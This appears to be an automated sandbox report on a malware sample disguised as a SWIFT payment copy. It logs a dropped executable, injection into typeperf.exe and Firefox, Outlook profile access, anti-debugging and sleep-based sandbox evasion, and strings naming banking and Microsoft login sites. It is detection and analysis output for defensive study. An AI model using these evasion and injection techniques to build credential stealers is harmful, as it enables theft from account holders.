            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeProcess created: C:\Windows\SysWOW64\typeperf.exe C:\Windows\SysWOW64\typeperf.exeJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\typeperf.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Binary string: firefox.pdbP source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1766828555.0000000007A0B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000000.1446184640.000000000078E000.00000002.00000001.01000000.00000005.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000000.1580578250.000000000078E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: typeperf.pdb source: btpqr.exe, 00000004.00000002.1526842326.00000000006C7000.00000004.00000020.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000002.3838573363.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: btpqr.exe, 00000002.00000003.1372381572.000000001D0B0000.00000004.00001000.00020000.00000000.sdmp, btpqr.exe, 00000002.00000003.1373122144.000000001D250000.00000004.00001000.00020000.00000000.sdmp, btpqr.exe, 00000004.00000002.1527020260.0000000000CBE000.00000040.00001000.00020000.00000000.sdmp, btpqr.exe, 00000004.00000003.1444358951.000000000097A000.00000004.00000020.00020000.00000000.sdmp, btpqr.exe, 00000004.00000003.1442583872.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, btpqr.exe, 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1526329092.0000000000B87000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1528531756.0000000002E15000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: btpqr.exe, btpqr.exe, 00000004.00000002.1527020260.0000000000CBE000.00000040.00001000.00020000.00000000.sdmp, btpqr.exe, 00000004.00000003.1444358951.000000000097A000.00000004.00000020.00020000.00000000.sdmp, btpqr.exe, 00000004.00000003.1442583872.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, btpqr.exe, 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, typeperf.exe, 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1526329092.0000000000B87000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1528531756.0000000002E15000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: typeperf.pdbGCTL source: btpqr.exe, 00000004.00000002.1526842326.00000000006C7000.00000004.00000020.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000002.3838573363.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: firefox.pdb source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1766828555.0000000007A0B000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeUnpacked PE file: 4.2.btpqr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_004151D6 EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_004151D6
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0040E015 push ecx; ret 2_2_0040E028
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0040A60A push ecx; ret 2_2_0040A61D
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_00429EF8 push eax; ret 2_2_00429F59
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_00429FA8 push eax; ret 2_2_00429F59
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040D054 push ebx; retf 4_2_0040D05A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0041429A push ebx; iretd 4_2_0041429B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_004034A0 push eax; ret 4_2_004034A2
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00414556 push esp; iretd 4_2_0041455E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00407DC3 push esp; retf 4_2_00407DE2
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0041ADA3 push edi; iretd 4_2_0041ADA5
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0042B7C2 push eax; ret 4_2_0042B7C4
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B2225F pushad ; ret 4_2_00B227F9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B227FA pushad ; ret 4_2_00B227F9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B2283D push eax; iretd 4_2_00B22858
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B509AD push ecx; mov dword ptr [esp], ecx4_2_00B509B6
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B21368 push eax; iretd 4_2_00B21369
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeCode function: 5_2_05033465 push ebx; retf 5_2_0503346B
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeCode function: 5_2_05041CE6 push eax; ret 5_2_05041CF3
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeCode function: 5_2_050419A9 pushfd ; retf 5_2_050419AF
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeCode function: 5_2_050411B4 push edi; iretd 5_2_050411B6
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeCode function: 5_2_0502E1D4 push esp; retf 5_2_0502E1F3
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeCode function: 5_2_05041B5E pushad ; retf 5_2_05041B6E
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeCode function: 5_2_05051BD3 push eax; ret 5_2_05051BD5
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeCode function: 5_2_05041AE4 pushad ; retf 5_2_05041B6E
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_02FC225F pushad ; ret 6_2_02FC27F9
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_02FC27FA pushad ; ret 6_2_02FC27F9
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_02FC283D push eax; iretd 6_2_02FC2858
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_02FF09AD push ecx; mov dword ptr [esp], ecx6_2_02FF09B6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_02FC1200 push eax; iretd 6_2_02FC1369
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_006F21AC push 38B5450Eh; iretd 6_2_006F21BF
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_0070831F push eax; ret 6_2_00708321
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeFile created: C:\Users\user\AppData\Local\Temp\btpqr.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0040B64C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0040B64C
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B9096E rdtsc 4_2_00B9096E
            Source: C:\Windows\SysWOW64\typeperf.exeWindow / User API: threadDelayed 9832Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeAPI coverage: 1.3 %
            Source: C:\Windows\SysWOW64\typeperf.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7752Thread sleep count: 139 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7752Thread sleep time: -278000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7752Thread sleep count: 9832 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7752Thread sleep time: -19664000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe TID: 7888Thread sleep time: -85000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe TID: 7888Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe TID: 7888Thread sleep time: -54000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe TID: 7888Thread sleep count: 42 > 30Jump to behavior
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe TID: 7888Thread sleep time: -42000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\typeperf.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\typeperf.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeCode function: 0_2_00405EC2 FindFirstFileA,FindClose,0_2_00405EC2
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeCode function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054EC
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_006FC010 FindFirstFileW,FindNextFileW,FindClose,6_2_006FC010
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_004277DA GetSystemInfo,2_2_004277DA
            Source: 281B196J.6.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: 281B196J.6.drBinary or memory string: discord.comVMware20,11696494690f
            Source: 281B196J.6.drBinary or memory string: AMC password management pageVMware20,11696494690
            Source: 281B196J.6.drBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: 281B196J.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: 281B196J.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: 281B196J.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: 281B196J.6.drBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: 281B196J.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: 281B196J.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: 281B196J.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: 281B196J.6.drBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3838730191.0000000000B5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
            Source: 281B196J.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: 281B196J.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: 281B196J.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: 281B196J.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: 281B196J.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: 281B196J.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: 281B196J.6.drBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: 281B196J.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: 281B196J.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: 281B196J.6.drBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: 281B196J.6.drBinary or memory string: global block list test formVMware20,11696494690
            Source: 281B196J.6.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: 281B196J.6.drBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: 281B196J.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: 281B196J.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: 281B196J.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: 281B196J.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: 281B196J.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: 281B196J.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeAPI call chain: ExitProcess graph end nodegraph_0-3203
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B9096E rdtsc 4_2_00B9096E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_004173A3 LdrLoadDll,4_2_004173A3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0040E1C5 _memset,IsDebuggerPresent,2_2_0040E1C5
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_004151D6 EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_004151D6
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_004151D6 EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_004151D6
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0042705F mov eax, dword ptr fs:[00000030h]2_2_0042705F
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0042717B mov eax, dword ptr fs:[00000030h]2_2_0042717B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_00427109 mov eax, dword ptr fs:[00000030h]2_2_00427109
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0042713E mov eax, dword ptr fs:[00000030h]2_2_0042713E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B480A0 mov eax, dword ptr fs:[00000030h]4_2_00B480A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE80A8 mov eax, dword ptr fs:[00000030h]4_2_00BE80A8
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5208A mov eax, dword ptr fs:[00000030h]4_2_00B5208A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4C0F0 mov eax, dword ptr fs:[00000030h]4_2_00B4C0F0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B920F0 mov ecx, dword ptr fs:[00000030h]4_2_00B920F0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4A0E3 mov ecx, dword ptr fs:[00000030h]4_2_00B4A0E3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B580E9 mov eax, dword ptr fs:[00000030h]4_2_00B580E9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD60E0 mov eax, dword ptr fs:[00000030h]4_2_00BD60E0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD20DE mov eax, dword ptr fs:[00000030h]4_2_00BD20DE
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C160B8 mov eax, dword ptr fs:[00000030h]4_2_00C160B8
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C160B8 mov ecx, dword ptr fs:[00000030h]4_2_00C160B8
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE6030 mov eax, dword ptr fs:[00000030h]4_2_00BE6030
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4A020 mov eax, dword ptr fs:[00000030h]4_2_00B4A020
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4C020 mov eax, dword ptr fs:[00000030h]4_2_00B4C020
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6E016 mov eax, dword ptr fs:[00000030h]4_2_00B6E016
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6E016 mov eax, dword ptr fs:[00000030h]4_2_00B6E016
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6E016 mov eax, dword ptr fs:[00000030h]4_2_00B6E016
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6E016 mov eax, dword ptr fs:[00000030h]4_2_00B6E016
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD4000 mov ecx, dword ptr fs:[00000030h]4_2_00BD4000
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF2000 mov eax, dword ptr fs:[00000030h]4_2_00BF2000
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF2000 mov eax, dword ptr fs:[00000030h]4_2_00BF2000
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF2000 mov eax, dword ptr fs:[00000030h]4_2_00BF2000
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF2000 mov eax, dword ptr fs:[00000030h]4_2_00BF2000
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF2000 mov eax, dword ptr fs:[00000030h]4_2_00BF2000
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF2000 mov eax, dword ptr fs:[00000030h]4_2_00BF2000
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF2000 mov eax, dword ptr fs:[00000030h]4_2_00BF2000
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF2000 mov eax, dword ptr fs:[00000030h]4_2_00BF2000
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7C073 mov eax, dword ptr fs:[00000030h]4_2_00B7C073
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B52050 mov eax, dword ptr fs:[00000030h]4_2_00B52050
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD6050 mov eax, dword ptr fs:[00000030h]4_2_00BD6050
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C161C3 mov eax, dword ptr fs:[00000030h]4_2_00C161C3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C161C3 mov eax, dword ptr fs:[00000030h]4_2_00C161C3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD019F mov eax, dword ptr fs:[00000030h]4_2_00BD019F
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD019F mov eax, dword ptr fs:[00000030h]4_2_00BD019F
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD019F mov eax, dword ptr fs:[00000030h]4_2_00BD019F
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD019F mov eax, dword ptr fs:[00000030h]4_2_00BD019F
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4A197 mov eax, dword ptr fs:[00000030h]4_2_00B4A197
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4A197 mov eax, dword ptr fs:[00000030h]4_2_00B4A197
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4A197 mov eax, dword ptr fs:[00000030h]4_2_00B4A197
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C261E5 mov eax, dword ptr fs:[00000030h]4_2_00C261E5
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B90185 mov eax, dword ptr fs:[00000030h]4_2_00B90185
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF4180 mov eax, dword ptr fs:[00000030h]4_2_00BF4180
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF4180 mov eax, dword ptr fs:[00000030h]4_2_00BF4180
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B801F8 mov eax, dword ptr fs:[00000030h]4_2_00B801F8
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C0C188 mov eax, dword ptr fs:[00000030h]4_2_00C0C188
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C0C188 mov eax, dword ptr fs:[00000030h]4_2_00C0C188
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCE1D0 mov eax, dword ptr fs:[00000030h]4_2_00BCE1D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCE1D0 mov eax, dword ptr fs:[00000030h]4_2_00BCE1D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCE1D0 mov ecx, dword ptr fs:[00000030h]4_2_00BCE1D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCE1D0 mov eax, dword ptr fs:[00000030h]4_2_00BCE1D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCE1D0 mov eax, dword ptr fs:[00000030h]4_2_00BCE1D0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B80124 mov eax, dword ptr fs:[00000030h]4_2_00B80124
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C24164 mov eax, dword ptr fs:[00000030h]4_2_00C24164
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C24164 mov eax, dword ptr fs:[00000030h]4_2_00C24164
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFA118 mov ecx, dword ptr fs:[00000030h]4_2_00BFA118
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFA118 mov eax, dword ptr fs:[00000030h]4_2_00BFA118
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFA118 mov eax, dword ptr fs:[00000030h]4_2_00BFA118
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFA118 mov eax, dword ptr fs:[00000030h]4_2_00BFA118
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE10E mov eax, dword ptr fs:[00000030h]4_2_00BFE10E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE10E mov ecx, dword ptr fs:[00000030h]4_2_00BFE10E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE10E mov eax, dword ptr fs:[00000030h]4_2_00BFE10E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE10E mov eax, dword ptr fs:[00000030h]4_2_00BFE10E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE10E mov ecx, dword ptr fs:[00000030h]4_2_00BFE10E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE10E mov eax, dword ptr fs:[00000030h]4_2_00BFE10E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE10E mov eax, dword ptr fs:[00000030h]4_2_00BFE10E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFE10E mov ecx, dword ptr fs:[00000030h]4_2_00BFE10E
